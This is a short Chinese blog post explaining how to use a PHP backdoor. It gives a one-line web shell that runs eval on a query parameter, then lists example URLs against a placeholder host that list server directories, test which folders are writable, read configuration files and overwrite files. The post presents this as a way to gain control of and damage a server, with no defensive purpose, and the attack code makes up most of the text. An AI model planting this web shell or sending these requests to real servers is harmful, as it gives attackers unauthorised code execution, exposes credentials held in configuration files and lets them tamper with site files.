欢迎光临杨雨的个人博客站!

杨雨个人网站-杨雨个人博客-杨照佳

杨雨个人博客网站

关注互联网和搜索引擎的个人博客网站

首页 > WEB开发 > PHP >

PHP后门的一些用法

发布时间:2019-06-05  编辑:杨雨个人博客网站   点击:   

今天我们说一些最常见的PHP留后门的一些用法

首先,写一个最简单的后门,也可以叫做木马。

<?php eval($_GET['evl']);

就这样,你已经获得了这台服务器上的很多执行权限。

那场景的用法有哪些呢?

打印服务器phpinfo

http://www.test.com/a.php?evl=phpinfo()

查看某个目录下有什么文件

http://www.test.com/a.php?evl=var_dump(system("ls /mnt/web/ -a"));

查看目录是否可写,接下里就可以在可写的目录里创建可执行文件了

http://www.test.com/a.php?evl=var_dump(is_writable("/mnt/web/abc/"));

获取某个文件的内容,一般用来读取配置

http://www.test.com/a.php?evl=var_dump(file_get_contents("/mnt/web/temp/api.php"));

对某个可写目录进行写文件

http://www.test.com/a.php?evl=var_dump(file_put_contents("/mnt/web/temp/api.php",file_get_contents("/mnt/web/script/test.php")));

好了,以上基本已经可以完成对一个服务器的查看的部分破坏了,其他的功能就试着举一反三吧。 本文地址:http://itbyc.com/php/21394.html
转载请注明出处。

分享是一种快乐,也是一种美德:
博客首页 | WEB开发 | 网站运营 | CMS使用教程 滇ICP备14002061号-1